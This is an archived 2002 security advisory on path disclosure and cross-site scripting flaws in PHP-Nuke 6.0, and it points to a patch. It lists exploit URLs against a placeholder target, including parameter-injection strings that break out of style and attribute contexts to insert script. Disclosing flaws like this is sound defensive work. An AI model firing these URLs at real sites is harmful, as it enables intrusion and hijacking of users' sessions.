Informations : °°°°°°°°°°°°°° Product : PHP-Nuke Version : 6.0 Website : http://www.phpnuke.org Problems : - Path Disclosure - XSS Developpement : °°°°°°°°°°°°°°° The majority of the PHPNuke's files are includes in modules.php or index.php. To prevent the direct access, PHPNuke made two kinds of safety. The first one (e.g. in modules/Downloads/index.php) is : --------------------------------------------------- if (!eregi("modules.php", $PHP_SELF)) { die ("You can't access this file directly..."); } --------------------------------------------------- The second one (e.g. footer.php ) : ------------------------------------ if (eregi("footer.php",$PHP_SELF)) { Header("Location: index.php"); die(); } ------------------------------------ Some files haven't these safety measures but they have security holes. Exploits : °°°°°°°°°° Path Disclosure : http://[target]/modules/Downloads/voteinclude.php http://[target]/modules/Your_Account/navbar.php http://[target]/modules/Forums/attachment.php http://[target]/modules/Forums/auth.php http://[target]/modules/News/comments.php http://[target]/modules/Private_Messages/functions.php http://[target]/modules/Private_Messages/index.php http://[target]/modules/Private_Messages/read.php http://[target]/modules/Private_Messages/reply.php http://[target]/modules/Web_Links/voteinclude.php http://[target]/modules/WebMail/contactbook.php?user=1 Path Disclosure & Cross Site Scripting : - http://[target]/modules/Forums/bb_smilies.php?name=[SCRIPT] or http://[target]/modules/Forums/bb_smilies.php?Default_Theme=[SCRIPT] or http://[target]/modules/Forums/bb_smilies.php?site_font=}--></style>[SCRIPT] or http://[target]/modules/Forums/bb_smilies.php?bgcolor1=">[SCRIPT] or with : $sitename $table_width $color1 $forumver - /modules/Forums/bbcode_ref.php with : $name $Default_Theme $site_font $sitename $bgcolor2 $textcolor1 $bgcolor1 $forumver - /modules/Forums/editpost.php, /modules/Forums/newtopic.php, /modules/Forums/reply.php, /modules/Forums/topicadmin.php, /modules/Forums/viewforum.php with : $name - /modules/Forums/searchbb.php with : $name $bgcolor3 $bgcolor1 Patch : °°°°°°° A patch can be found on http://www.phpsecure.org . More details : °°°°°°°°°°°°°° In French : http://www.frog-man.org/tutos/PHPNuke6.0.txt Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FPHPNuke6.0.txt&langpair=fr%7Cen&hl=en&ie=ASCII&oe=ASCII frog-m@n _________________________________________________________________ MSN Messenger : discutez en direct avec vos amis ! http://www.msn.fr/msger/default.asp
This archive was generated by hypermail 2b30 : Wed Dec 18 2002 - 18:05:08 PST